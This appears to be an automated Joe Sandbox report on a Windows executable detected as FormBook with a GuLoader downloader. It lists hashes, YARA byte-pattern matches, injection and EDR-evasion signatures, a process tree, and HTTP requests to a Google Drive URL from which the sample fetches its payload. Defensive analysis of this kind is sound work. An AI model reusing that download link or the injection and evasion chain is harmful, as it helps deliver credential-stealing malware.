Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LkzvfB4VFj.exe

Overview

General Information

Sample name:LkzvfB4VFj.exe
Analysis ID:1552178
MD5:a5104b4d665dc081181fd163dce0bb77
SHA1:e72855a64aace2ecf6aa008942e443d2ac7508d7
SHA256:aa047fd2e21f33564c1178d063122fc9368afc5c6a5455c4381a3f5edde4b145
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • LkzvfB4VFj.exe (PID: 2368 cmdline: "C:\Users\user\Desktop\LkzvfB4VFj.exe" MD5: A5104B4D665DC081181FD163DCE0BB77)
    • LkzvfB4VFj.exe (PID: 3100 cmdline: "C:\Users\user\Desktop\LkzvfB4VFj.exe" MD5: A5104B4D665DC081181FD163DCE0BB77)
      • RAVCpl64.exe (PID: 4376 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bc40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13cff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000000.00000002.92764803526.0000000005D64000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-08T14:23:31.460462+010028032702Potentially Bad Traffic192.168.11.2049762142.250.72.110443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: LkzvfB4VFj.exeAvira: detected
      Multi AV Scanner detection for submitted file
      Source: LkzvfB4VFj.exeReversingLabs: Detection: 55%
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: LkzvfB4VFj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.72.110:443 -> 192.168.11.20:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49763 version: TLS 1.2
      Source: LkzvfB4VFj.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: LkzvfB4VFj.exe, LkzvfB4VFj.exe, 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041084004.0000000035BF3000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93044327286.0000000035DAC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 4x nop then mov ebx, 00000004h3_2_05C804DE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 4x nop then mov ebx, 00000004h3_2_35C804DE
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 4x nop then mov ebx, 00000004h3_2_35CE04DE
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49762 -> 142.250.72.110:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: LkzvfB4VFj.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: LkzvfB4VFj.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/.
      Source: LkzvfB4VFj.exe, 00000003.00000002.93678949713.0000000035320000.00000004.00001000.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6
      Source: LkzvfB4VFj.exe, 00000003.00000002.93668767945.0000000005D28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6Wqu_
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/T
      Source: LkzvfB4VFj.exe, 00000003.00000003.92761499031.0000000005DED000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93042110969.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041617359.0000000005DEE000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DEE000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D91000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=download
      Source: LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005D8B000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.93041780231.0000000005D8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=downloadP
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=18FXQaaqaUFSIPXdu_u34XlulgDX2i5H6&export=downloade
      Source: LkzvfB4VFj.exe, 00000003.00000001.92670024894.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: LkzvfB4VFj.exe, 00000003.00000003.93041945813.0000000005DA7000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000002.93669076974.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmp, LkzvfB4VFj.exe, 00000003.00000003.92761352469.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: LkzvfB4VFj.exe, 00000003.00000003.92730858345.0000000005DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownHTTPS traffic detected: 142.250.72.110:443 -> 192.168.11.20:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49763 version: TLS 1.2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

      E-Banking Fraud

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000003.00000002.93680274957.0000000035BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD34E0 NtCreateMutant,LdrInitializeThunk,3_2_35FD34E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_35FD2D10
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2EB0 NtProtectVirtualMemory,LdrInitializeThunk,3_2_35FD2EB0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2BC0 NtQueryInformationToken,LdrInitializeThunk,3_2_35FD2BC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_35FD2B90
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD3C90 NtOpenThread,3_2_35FD3C90
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD3C30 NtOpenProcessToken,3_2_35FD3C30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD38D0 NtGetContextThread,3_2_35FD38D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD4570 NtSuspendThread,3_2_35FD4570
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD4260 NtSetContextThread,3_2_35FD4260
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2DC0 NtAdjustPrivilegesToken,3_2_35FD2DC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2DA0 NtReadVirtualMemory,3_2_35FD2DA0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2D50 NtWriteVirtualMemory,3_2_35FD2D50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2CF0 NtDelayExecution,3_2_35FD2CF0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2CD0 NtEnumerateKey,3_2_35FD2CD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2C50 NtUnmapViewOfSection,3_2_35FD2C50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2C30 NtMapViewOfSection,3_2_35FD2C30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2C20 NtSetInformationFile,3_2_35FD2C20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2C10 NtOpenProcess,3_2_35FD2C10
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2FB0 NtSetValueKey,3_2_35FD2FB0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2F30 NtOpenDirectoryObject,3_2_35FD2F30
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2F00 NtCreateFile,3_2_35FD2F00
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2ED0 NtResumeThread,3_2_35FD2ED0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2EC0 NtQuerySection,3_2_35FD2EC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2E80 NtCreateProcessEx,3_2_35FD2E80
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2E50 NtCreateSection,3_2_35FD2E50
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2E00 NtQueueApcThread,3_2_35FD2E00
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD29F0 NtReadFile,3_2_35FD29F0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD29D0 NtWaitForSingleObject,3_2_35FD29D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2BE0 NtQueryVirtualMemory,3_2_35FD2BE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2B80 NtCreateKey,3_2_35FD2B80
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2B20 NtQueryInformationProcess,3_2_35FD2B20
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2B10 NtAllocateVirtualMemory,3_2_35FD2B10
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2B00 NtQueryValueKey,3_2_35FD2B00
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2AC0 NtEnumerateValueKey,3_2_35FD2AC0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2AA0 NtQueryInformationFile,3_2_35FD2AA0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2A80 NtClose,3_2_35FD2A80
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD2A10 NtWriteFile,3_2_35FD2A10
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C93471 NtSetContextThread,3_2_05C93471
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C93781 NtSuspendThread,3_2_05C93781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_05C93A93 NtResumeThread,3_2_05C93A93
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C93471 NtSetContextThread,3_2_35C93471
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C93781 NtSuspendThread,3_2_35C93781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35C93A93 NtResumeThread,3_2_35C93A93
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CF3471 NtSetContextThread,3_2_35CF3471
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CF3781 NtSuspendThread,3_2_35CF3781
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35CF3A93 NtResumeThread,3_2_35CF3A93
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeFile created: C:\Windows\Arder.lnkJump to behavior
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_004069450_2_00406945
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_0040711C0_2_0040711C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 0_2_6FEB1A980_2_6FEB1A98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D62C3_2_3603D62C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3604D6463_2_3604D646
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360136EC3_2_360136EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605F6F63_2_3605F6F6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3600D4803_2_3600D480
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360575C63_2_360575C6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605F5C93_2_3605F5C9
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBB1E03_2_35FBB1E0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA51C03_2_35FA51C0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605124C3_2_3605124C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE717A3_2_35FE717A
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8F1133_2_35F8F113
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FAB0D03_2_35FAB0D0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605F3303_2_3605F330
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FD508C3_2_35FD508C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F913803_2_35F91380
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_360570F13_2_360570F1
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35F8D2EC3_2_35F8D2EC
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603D1303_2_3603D130
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA9DD03_2_35FA9DD0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36059ED23_2_36059ED2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FBFCE03_2_35FBFCE0
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3601FF403_2_3601FF40
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605FF633_2_3605FF63
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA3C603_2_35FA3C60
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36051FC63_2_36051FC6
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36039C983_2_36039C98
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36027CE83_2_36027CE8
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3605FD273_2_3605FD27
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FA1EB23_2_35FA1EB2
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_36057D4C3_2_36057D4C
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_3603FDF43_2_3603FDF4
      Source: C:\Users\user\Desktop\LkzvfB4VFj.exeCode function: 3_2_35FE59C03_2_35FE59C0
